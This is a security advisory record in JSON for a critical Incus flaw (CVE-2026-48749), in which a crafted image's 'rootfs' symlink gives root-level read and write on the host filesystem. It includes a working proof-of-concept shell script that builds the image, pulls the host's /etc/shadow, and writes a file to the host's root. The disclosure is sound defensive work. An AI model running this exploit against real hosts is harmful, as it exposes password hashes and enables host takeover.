{"id":"GHSA-2q3f-q5pq-g8wv","summary":"Incus has an arbitrary file read+write on host via rootfs/ symlink in malicious image","details":"### Summary\n\nA specially crafted image can be used to read or create/write arbitrary files on the host; possibly leading to arbitrary command execution.\n\n\n### Details\n\nIncus validates an image as soon as it sees a normal `metadata.yaml` and a `rootfs/` entry, but full extraction can later process a duplicate top-level `rootfs` symlink. Later, the stopped-container file API opens `d.RootfsPath()` and passes that file descriptor to `forkfile`, which chroots to it.\n\n```\nmetadata.yaml\nrootfs/\nrootfs -\u003e /\n```\n\nIn practice, this allows a malicious actor to access the host's filesystem with root privileges.\n\n\n### PoC\n\nBelow, we map the container's rootfs to `/` on the host, but it can be mapped anywhere. We then retrieve the host's `/etc/shadow` file and create a file in `/`.\n\n```\n#!/bin/sh\nset -eu\n\ntmpdir=$(mktemp -d)\ncleanup() {\n    rm -rf \"${tmpdir}\"\n}\ntrap cleanup EXIT INT QUIT TERM HUP\n\nmkdir -p \"${tmpdir}/img/rootfs\"\ncat\u003c\u003c__EOF__\u003e\"${tmpdir}/img/metadata.yaml\"\narchitecture: x86_64\ncreation_date: 1\nproperties:\n  description: PoC rootfs symlink host afrw\n__EOF__\n\ncd \"${tmpdir}/img\"\ntar --owner=0 --group=0 -f- -c * \u003e../afrw-rootfs-symlink.tar\n\n# inject rootfs symlink\nrmdir rootfs\nln -s / rootfs\ntar --owner=0 --group=0 -f ../afrw-rootfs-symlink.tar --append rootfs\n\n\nincus image import ../afrw-rootfs-symlink.tar --alias afrw-rootfs-symlink\nincus init afrw-rootfs-symlink afrw-rootfs-symlink\n\n\n# read\nincus file pull afrw-rootfs-symlink/etc/shadow \"${tmpdir}/shadow\"\ncat \"${tmpdir}/shadow\"\n\n# write\nprintf 'afrw-rootfs-symlink\\n' \u003e\"${tmpdir}/afrw-rootfs-symlink\"\nincus file push \"${tmpdir}/afrw-rootfs-symlink\" afrw-rootfs-symlink/\n```\n\n### Impact\n\nArbitrary file read and write on the host via unsanitized symlink; possibly leading to command execution.","aliases":["CVE-2026-48749","GO-2026-5798"],"modified":"2026-07-07T20:41:24.774305746Z","published":"2026-06-26T18:31:21Z","database_specific":{"severity":"CRITICAL","github_reviewed":true,"github_reviewed_at":"2026-06-26T18:31:21Z","nvd_published_at":null,"cwe_ids":["CWE-73"]},"references":[{"type":"WEB","url":"https://github.com/lxc/incus/security/advisories/GHSA-2q3f-q5pq-g8wv"},{"type":"PACKAGE","url":"https://github.com/lxc/incus"}],"affected":[{"package":{"name":"github.com/lxc/incus/v7/cmd/incusd","ecosystem":"Go","purl":"pkg:golang/github.com/lxc/incus/v7/cmd/incusd"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"7.2.0"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/06/GHSA-2q3f-q5pq-g8wv/GHSA-2q3f-q5pq-g8wv.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"}]}